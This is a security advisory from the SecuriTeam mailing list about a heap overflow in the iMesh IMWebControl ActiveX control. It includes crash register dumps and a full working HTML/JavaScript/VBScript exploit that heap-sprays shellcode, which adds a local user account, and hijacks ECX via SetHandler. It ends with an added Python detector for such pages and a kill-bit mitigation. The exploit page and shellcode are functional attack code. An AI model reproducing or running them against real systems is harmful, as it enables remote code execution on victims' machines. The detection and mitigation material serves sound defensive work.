[NT] iMesh IMWebControl Class Heap Overflow



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



iMesh IMWebControl Class Heap Overflow
------------------------------------------------------------------------


SUMMARY

iMesh is "a file sharing and online social network. It uses a proprietary,
centralized, P2P protocol. iMesh is owned by an American company iMesh,
Inc. and maintains a development center in Israel". A vulnerability in the
iMesh ActiveX control allows an attacker to overflow a heap buffer
allocated by the product, which in turn can be used to execute arbitrary
code.

DETAILS

Vulnerable Systems:
* iMesh version 7.1.0.x and prior (IMWeb.dll 7.0.0.x)

The iMesh client crashes when an empty value is passed to the
ProcessRequestEx method of the IMWebControl control; the register state at
the crash is:
EAX 9F291974
ECX 4D554E00 WINHTTP.4D554E00
EDX 017EF438
EBX 00000000
ESP 017EF410
EBP 017EF430
ESI 017EF438
EDI 01F51FF8
EIP 01F23A9C IMWebCon.01F23A9C

..
01F23A90 8B8F A8000000 MOV ECX,DWORD PTR DS:[EDI+A8]
01F23A96 8B01 MOV EAX,DWORD PTR DS:[ECX]
01F23A98 52 PUSH EDX
01F23A99 8BD6 MOV EDX,ESI
01F23A9B 52 PUSH EDX
01F23A9C FF10 CALL DWORD PTR DS:[EAX] <----- crash

At first sight this looked unexploitable: ECX points into winhttp.dll,
which holds the value 0x9F291974. However, rgod found that through the
SetHandler method ECX can be hijacked to an arbitrary value. Setting it to
218959117 (0x0D0D0D0D) gives:

EAX 017EF438
ECX 0D0D0D0D
EDX 017EF43C
EBX 00000000
ESP 017EF418
EBP 017EF430
ESI 017EF438
EDI 01EF1FF8
EIP 01EC3A96 IMWebCon.01EC3A96

..
01EC3A90 8B8F A8000000 MOV ECX,DWORD PTR DS:[EDI+A8]
01EC3A96 8B01 MOV EAX,DWORD PTR DS:[ECX] <------- crash
01EC3A98 52 PUSH EDX
01EC3A99 8BD6 MOV EDX,ESI
01EC3A9B 52 PUSH EDX
01EC3A9C FF10 CALL DWORD PTR DS:[EAX]

This is an access violation when reading from 0x0D0D0D0D, an address whose
contents the attacker can control with the heap spray used in the exploit
below, which makes the bug exploitable.

Exploit:
<html>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9'
id='IMWebControl' /></object>
<SCRIPT language="javascript">
// shellcode: adds a user account, user: sun, pass: tzu
// (the mailing list wrapped the literal; it is joined here with + so it stays valid JavaScript)
shellcode =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231" +
"%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241" +
"%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555" +
"%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78" +
"%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841" +
"%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31" +
"%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434" +
"%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c" +
"%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861" +
"%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b" +
"%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b" +
"%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70" +
"%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146" +
"%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f" +
"%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f" +
"%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f" +
"%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172" +
"%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f" +
"%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134" +
"%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055" +
"%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244" +
"%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e" +
"%u3470%u506f%u6741%u7734%u4734%u4570");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<77;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0707%u0707");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=77;i<144;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0909%u0909");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=144;i<500;i++){memory[i] = block+shellcode}
</script>
<script language='vbscript'>
puf=218959117 'set ecx to 0x0d0d0d0d
IMWebControl.SetHandler puf
puf=""
IMWebControl.ProcessRequestEx puf
</script>
</html>
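As an added example (not part of the advisory and not rgod's code), the following Python heuristic shows how a proxy, mail gateway or sandbox could flag a fetched page that follows the pattern above: it looks for the IMWebControl CLSID, decodes %u-encoded strings the way JavaScript's unescape() does, measures whether a decoded blob is near-uniform filler (the %u9090 / %u0707 / %u0909 blocks), spots the string-doubling loop that grows a block to a fixed large size, and resolves the SetHandler argument to see whether it equals the 0x0D0D0D0D spray address. The CLSID and the value 218959117 come from the advisory; the heuristics, thresholds, function names and the constructed SAMPLE_PAGE (which uses a dummy %u payload, not the shellcode) are assumptions of this example.

```python
# Added example: heuristic detector for pages that instantiate the iMesh
# IMWebControl control and prepare a heap spray for it. Not part of the
# advisory or of rgod's exploit; thresholds, names and SAMPLE_PAGE are assumptions.
import re
from typing import Dict, List

IMESH_CLSID = "7C3B01BC-53A5-48A0-A43B-0C67731134B9"  # from the advisory
SPRAY_ADDR = 0x0D0D0D0D                               # 218959117 in the advisory

# unescape("%uXXXX%uXXXX...") literals, single- or double-quoted, possibly line-wrapped
_UNESCAPE_RE = re.compile(r"""unescape\(\s*(["'])((?:%u[0-9a-fA-F]{4}\s*)+)\1\s*\)""")
# while (... < 0xNNNN) : a block doubled up to a fixed large size
_SPRAY_LOOP_RE = re.compile(r"while\s*\([^)]*<\s*0x[0-9a-fA-F]{4,}\s*\)", re.I)
# VBScript-style call "SetHandler <arg>"
_SETHANDLER_RE = re.compile(r"\bSetHandler\s+(\w+)", re.I)
# simple numeric assignments (VBScript &H.., JS 0x.., decimal) so SetHandler args resolve
_ASSIGN_RE = re.compile(r"\b(\w+)\s*=\s*(&H[0-9a-fA-F]+|0x[0-9a-fA-F]+|\d+)\b", re.I)


def decode_unescape(blob: str) -> bytes:
    """Bytes that JavaScript's unescape("%uXXXX...") leaves in memory (UTF-16LE units)."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9a-fA-F]{4})", blob):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def fill_ratio(data: bytes) -> float:
    """Share of the buffer taken by its most common byte; 1.0 means pure filler."""
    if not data:
        return 0.0
    return max(data.count(b) for b in set(data)) / len(data)


def _literal(tok: str) -> int:
    t = tok.upper()
    if t.startswith("&H") or t.startswith("0X"):
        return int(t[2:], 16)
    return int(t)


def scan_page(html: str) -> Dict[str, object]:
    """Return the heuristics that fire on `html`, the largest decoded %u blob size and a score."""
    findings: List[str] = []
    if IMESH_CLSID.lower() in html.lower():
        findings.append("imesh_clsid")          # page instantiates the vulnerable control
    blobs = [decode_unescape(m.group(2)) for m in _UNESCAPE_RE.finditer(html)]
    payload = max(blobs, key=len, default=b"")
    if len(payload) >= 64:
        findings.append("encoded_payload")      # large %u-encoded blob, shellcode-sized
    if any(len(b) >= 4 and fill_ratio(b) >= 0.99 for b in blobs):
        findings.append("fill_pattern")         # %u9090 / %u0d0d style filler block
    if _SPRAY_LOOP_RE.search(html):
        findings.append("spray_loop")           # string grown to a fixed large size
    values = {name: _literal(val) for name, val in _ASSIGN_RE.findall(html)}
    for arg in _SETHANDLER_RE.findall(html):
        if values.get(arg) == SPRAY_ADDR or (arg.isdigit() and int(arg) == SPRAY_ADDR):
            findings.append("sethandler_spray_addr")   # ECX pointed into the sprayed heap
            break
    return {"findings": findings, "payload_bytes": len(payload), "score": len(findings)}


# Constructed sample page (assumption): same structure as the advisory's exploit,
# but the payload is 40 dummy code units (0x4100..0x4127), not shellcode.
_FAKE_PAYLOAD = "".join("%%u%04x" % (0x4100 + n) for n in range(40))
SAMPLE_PAGE = f"""<html>
<object classid='clsid:{IMESH_CLSID}' id='IMWebControl'></object>
<script language="javascript">
shellcode = unescape("{_FAKE_PAYLOAD}");
bigblock = unescape("%u0d0d%u0d0d");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<500;i++){{memory[i] = block+shellcode}}
</script>
<script language='vbscript'>
puf=218959117
IMWebControl.SetHandler puf
puf=""
IMWebControl.ProcessRequestEx puf
</script>
</html>"""

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE))
    print(scan_page("<html><body>no activex here</body></html>"))
```

The CLSID match alone is a low-confidence signal (a legitimate iMesh page also embeds the control); the combination of filler blocks, a doubling loop and a SetHandler argument equal to the spray address is what distinguishes this pattern. Setting the kill bit for the CLSID in Internet Explorer's ActiveX Compatibility registry key remains the practical mitigation while the vulnerable IMWeb.dll is installed.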


ADDITIONAL INFORMATION

The information has been provided by <mailto:retrog@xxxxxxxx> rgod.
The original article can be found at:
http://retrogod.altervista.org/rgod_imesh.html



